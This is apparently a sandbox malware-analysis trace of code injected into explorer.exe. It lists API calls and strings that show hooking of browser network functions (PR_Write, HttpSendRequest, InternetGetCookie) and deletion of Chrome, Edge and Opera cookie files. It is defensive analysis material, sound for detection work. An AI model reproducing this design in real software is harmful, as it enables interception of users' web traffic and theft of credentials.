                                                                                                                                                                                                              control_flow_graph 0 2ca3862-2ca38de call 2ca1000 GetModuleFileNameA call 2ca1000 GetCurrentProcessId wsprintfA call 2ca118d CreateMutexA GetLastError 7 2ca38e4-2ca3940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 2ca1000 Sleep lstrcmpiA 0->7 8 2ca3bc5-2ca3c3a call 2ca1011 * 2 RtlExitUserThread call 2ca1000 * 2 wsprintfA call 2ca1235 0->8 14 2ca3a0a-2ca3a14 lstrcmpiA 7->14 15 2ca3946-2ca3961 GetCommandLineW CommandLineToArgvW 7->15 70 2ca3c5e 8->70 71 2ca3c3c-2ca3c4c call 2ca1141 8->71 17 2ca3a1a-2ca3a24 lstrcmpiA 14->17 18 2ca3b14-2ca3b39 call 2ca16c7 GetModuleHandleA GetProcAddress 14->18 19 2ca3bc3-2ca3bc4 15->19 20 2ca3967-2ca398b call 2ca16c7 GetModuleHandleA GetProcAddress 15->20 17->18 23 2ca3a2a-2ca3a40 lstrcmpiA 17->23 30 2ca3b3b-2ca3b47 call 2ca1c08 18->30 31 2ca3b4c-2ca3b59 GetModuleHandleA GetProcAddress 18->31 19->8 35 2ca399e-2ca39c0 GetModuleHandleA GetProcAddress 20->35 36 2ca398d-2ca3999 call 2ca1c08 20->36 26 2ca3a42-2ca3a4e GetCommandLineA StrStrIA 23->26 27 2ca3a67-2ca3a71 lstrcmpiA 23->27 26->27 32 2ca3a50 26->32 33 2ca3a88-2ca3a92 lstrcmpiA 27->33 34 2ca3a73-2ca3a7f GetCommandLineA StrStrIA 27->34 30->31 42 2ca3b5b-2ca3b67 call 2ca1c08 31->42 43 2ca3b6c-2ca3b79 GetModuleHandleA GetProcAddress 31->43 44 2ca3a55-2ca3a65 GetModuleHandleA 32->44 33->19 46 2ca3a98-2ca3aa4 GetCommandLineA StrStrIA 33->46 34->33 45 2ca3a81-2ca3a86 34->45 38 2ca39c2-2ca39d0 GetModuleHandleA GetProcAddress 35->38 39 2ca39d6-2ca39e8 GetModuleHandleA GetProcAddress 35->39 36->35 38->39 48 2ca3b08-2ca3b0f call 2ca16c7 38->48 50 2ca39ea-2ca39f3 GetModuleHandleA GetProcAddress 39->50 51 2ca39f9-2ca3a05 39->51 42->43 53 2ca3b7b-2ca3b87 call 2ca1c08 43->53 54 2ca3b8c-2ca3bbe call 2ca16c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 43->54 55 2ca3ace-2ca3ad2 44->55 45->44 46->19 56 2ca3aaa-2ca3ac5 GetModuleHandleA 46->56 48->19 50->48 50->51 60 2ca3b03 call 2ca1c08 51->60 53->54 54->19 55->19 57 2ca3ad8-2ca3aea call 2ca16c7 call 2ca2d9a 55->57 56->57 58 2ca3ac7-2ca3acc GetModuleHandleA 56->58 57->48 79 2ca3aec-2ca3af5 call 2ca1274 57->79 58->55 60->48 74 2ca3c64-2ca3c74 CreateToolhelp32Snapshot 70->74 80 2ca3c4e call 2ca3829 71->80 81 2ca3c53-2ca3c59 call 2ca1261 71->81 77 2ca3c7a-2ca3c8e Process32First 74->77 78 2ca3d7d-2ca3d88 Sleep 74->78 82 2ca3d6e-2ca3d70 77->82 78->74 79->48 93 2ca3af7-2ca3b01 79->93 80->81 81->70 85 2ca3c93-2ca3ca5 lstrcmpiA 82->85 86 2ca3d76-2ca3d77 CloseHandle 82->86 89 2ca3cda-2ca3ce3 call 2ca12aa 85->89 90 2ca3ca7-2ca3cb5 lstrcmpiA 85->90 86->78 97 2ca3d62-2ca3d68 Process32Next 89->97 98 2ca3ce5-2ca3cee call 2ca1305 89->98 90->89 91 2ca3cb7-2ca3cc5 lstrcmpiA 90->91 91->89 94 2ca3cc7-2ca3cd4 call 2ca2ea8 91->94 93->60 94->89 94->97 97->82 98->97 102 2ca3cf0-2ca3cf7 call 2ca1320 98->102 102->97 105 2ca3cf9-2ca3d06 call 2ca1274 102->105 105->97 108 2ca3d08-2ca3d5d lstrcmpiA call 2ca1090 call 2ca1fe5 call 2ca1090 105->108 108->97
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CA3886
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000001), ref: 02CA389B
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA38B6
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02CA11A9
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02CA11C1
                                                                                                                                                                                                                • Part of subcall function 02CA118D: lstrlen.KERNEL32(?,00000000), ref: 02CA11C9
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02CA11D4
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02CA11EE
                                                                                                                                                                                                                • Part of subcall function 02CA118D: wsprintfA.USER32 ref: 02CA1205
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptDestroyHash.ADVAPI32(?), ref: 02CA121E
                                                                                                                                                                                                                • Part of subcall function 02CA118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA1228
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA38CD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA38D3
                                                                                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(02CA6038), ref: 02CA38F3
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 02CA38FA
                                                                                                                                                                                                              • lstrcat.KERNEL32(02CA5CDE,00000000), ref: 02CA3910
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02CA392A
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 02CA393C
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(?), ref: 02CA394F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 02CA397E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3987
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 02CA39AF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA39B2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 02CA39C4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA39C7
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 02CA39E1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA39E4
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 02CA39EC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA39EF
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 02CA3A6D
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A78
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02CA3A7B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 02CA3A8E
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A9D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02CA3AA0
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(opera.dll), ref: 02CA3ABF
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 02CA3ACC
                                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 02CA3956
                                                                                                                                                                                                                • Part of subcall function 02CA16C7: GetCurrentProcessId.KERNEL32 ref: 02CA16D9
                                                                                                                                                                                                                • Part of subcall function 02CA16C7: GetCurrentThreadId.KERNEL32 ref: 02CA16E1
                                                                                                                                                                                                                • Part of subcall function 02CA16C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02CA16F1
                                                                                                                                                                                                                • Part of subcall function 02CA16C7: Thread32First.KERNEL32(00000000,0000001C), ref: 02CA16FF
                                                                                                                                                                                                                • Part of subcall function 02CA16C7: CloseHandle.KERNEL32(00000000), ref: 02CA1758
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 02CA3A10
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 02CA3A20
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 02CA3A30
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A47
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02CA3A4A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(chrome.dll), ref: 02CA3A5F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 02CA3B2C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3B35
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 02CA3B52
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3B55
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 02CA3B72
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3B75
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 02CA3B99
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3B9C
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 02CA3BA9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3BAC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 02CA3BB9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA3BBC
                                                                                                                                                                                                                • Part of subcall function 02CA1C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 02CA1C42
                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 02CA3BD9
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA3C1F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA3C69
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02CA3C88
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02CA3D77
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02CA3D82
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                                                                                                              • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                                                                                                              • API String ID: 2480436012-2618538661
                                                                                                                                                                                                              • Opcode ID: 8e1c5c3aa51098f9539297d6c59f6cb58e0bcaaf51b5e0f58cc0af8317590f11
                                                                                                                                                                                                              • Instruction ID: c77c6d4c5b10faf734a329d5eeb9450a869d497a8cc5c0e404adc7decf800bc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e1c5c3aa51098f9539297d6c59f6cb58e0bcaaf51b5e0f58cc0af8317590f11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ABA1C670A80397ABE72477756C7AF2F3A9D9F80A4DB150A24F506E3140DBF4C9019BE5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 02CA15EB
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA15F7
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02CA41C8), ref: 02CA1623
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02CA41CC), ref: 02CA1633
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA164C
                                                                                                                                                                                                              • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 02CA1661
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA167E
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA169C
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02CA16AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                                                                                                              • String ID: *.*$Cookies*
                                                                                                                                                                                                              • API String ID: 4256701249-3228320225
                                                                                                                                                                                                              • Opcode ID: 8f8f32dcae7abe11c526c6985b8258b1888b8222a9a5157a1bf0d49403fee257
                                                                                                                                                                                                              • Instruction ID: d1f83f3c2a31874af709ed4b9952c6867cf0765c25809a421c940ad2068cb88d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8f32dcae7abe11c526c6985b8258b1888b8222a9a5157a1bf0d49403fee257
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7721AB316043069BD314AB64DC55A7F77EDEBC939DF080A29F946E3240DBF4C9055BA2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: wsprintfW.USER32 ref: 02CA142A
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA1439
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: wsprintfW.USER32 ref: 02CA1476
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 02CA149C
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA14AF
                                                                                                                                                                                                                • Part of subcall function 02CA13FE: FindClose.KERNELBASE(00000000), ref: 02CA14BA
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA150D
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA1557
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02CA158F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                                                                              • String ID: %s%s$*.*
                                                                                                                                                                                                              • API String ID: 2055899612-705776850
                                                                                                                                                                                                              • Opcode ID: f5e6159dfc614f1f8441c5e6a686e204198c774606e4b3d9b67180e5f4e71d92
                                                                                                                                                                                                              • Instruction ID: 2119652b58f4a82ec316f85c0f8e06feb96dd6c615299999bc4d9d64ab015534
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5e6159dfc614f1f8441c5e6a686e204198c774606e4b3d9b67180e5f4e71d92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 251136316003055BE324AB349C6AB6F3B9DEF8535CF040A28FE4693181DBF48A1596E6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA142A
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA1439
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA1476
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F
                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(00000000), ref: 02CA149C
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA14AF
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02CA14BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                                                                              • String ID: %s%s$%s%s\$*.*
                                                                                                                                                                                                              • API String ID: 2055899612-4093207852
                                                                                                                                                                                                              • Opcode ID: 7a1625632490d9e837c086e66c8559e40ccc32fcc44b98e075470c0cae10aef1
                                                                                                                                                                                                              • Instruction ID: 94726930ad3563d4c23b02885ec6fb35759bdf38d3fb7899d2435adfa1c15d1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1625632490d9e837c086e66c8559e40ccc32fcc44b98e075470c0cae10aef1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F31127306043425BE324AB28DC59B7F77DDEFD530DF080A2CFA4AA3181DBF4490596A2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02CA3DAF
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CA3DE2
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02CA3DEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4050682147-0
                                                                                                                                                                                                              • Opcode ID: fcbd49ddbe60821cc3116d17d1bac4002cd4860565fd1a65f1730be4ef1dee64
                                                                                                                                                                                                              • Instruction ID: 46c19acb439607706a353c2cdb95b0fca521b81577865394203e922229a331be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcbd49ddbe60821cc3116d17d1bac4002cd4860565fd1a65f1730be4ef1dee64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E601F0309401C2DFCB28AB64D879B777B6DDF4131DF194A99E41687180C77A8691DFE0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 312 2ca2ea8-2ca2ebc StrStrIA 313 2ca2ebe-2ca2eca call 2ca2e1b 312->313 314 2ca2ecd-2ca2ed1 312->314 313->314
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,02CA3CD2), ref: 02CA2EB4
                                                                                                                                                                                                                • Part of subcall function 02CA2E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02CA2EC5), ref: 02CA2E27
                                                                                                                                                                                                                • Part of subcall function 02CA2E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02CA2E52
                                                                                                                                                                                                                • Part of subcall function 02CA2E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02CA2E7F
                                                                                                                                                                                                                • Part of subcall function 02CA2E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 02CA2E92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • chrome.exe|opera.exe|msedge.exe, xrefs: 02CA2EAB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$InformationQuery$Open
                                                                                                                                                                                                              • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                                                                                                              • API String ID: 4117927671-3743313796
                                                                                                                                                                                                              • Opcode ID: e4927e85d4adc78b3296ebc9625284535c167ccf6658d09afc23e522d5c6505d
                                                                                                                                                                                                              • Instruction ID: bd74bfe4e7f8d1cf506c4f0ec6767db3484718a99e86cc3ea75c29e748a84e76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4927e85d4adc78b3296ebc9625284535c167ccf6658d09afc23e522d5c6505d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BD0A93230027207273C257A6C2992F958ECAC296A302023EE906D3200EA80CC4342E1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
                                                                                                                                                                                                                • Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB
                                                                                                                                                                                                                • Part of subcall function 02CA1363: lstrcmpiA.KERNEL32(?), ref: 02CA13A3
                                                                                                                                                                                                                • Part of subcall function 02CA1363: Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3731
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3752
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3764
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 02CA15EB
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA15F7
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: lstrcmpiW.KERNEL32(?,02CA41C8), ref: 02CA1623
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: lstrcmpiW.KERNEL32(?,02CA41CC), ref: 02CA1633
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA164C
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA169C
                                                                                                                                                                                                                • Part of subcall function 02CA15BE: FindClose.KERNELBASE(00000000), ref: 02CA16AB
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00001000), ref: 02CA377A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3783
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA378F
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00001000), ref: 02CA37A3
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA37AC
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA37B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                                                                                              • API String ID: 909495591-1175993956
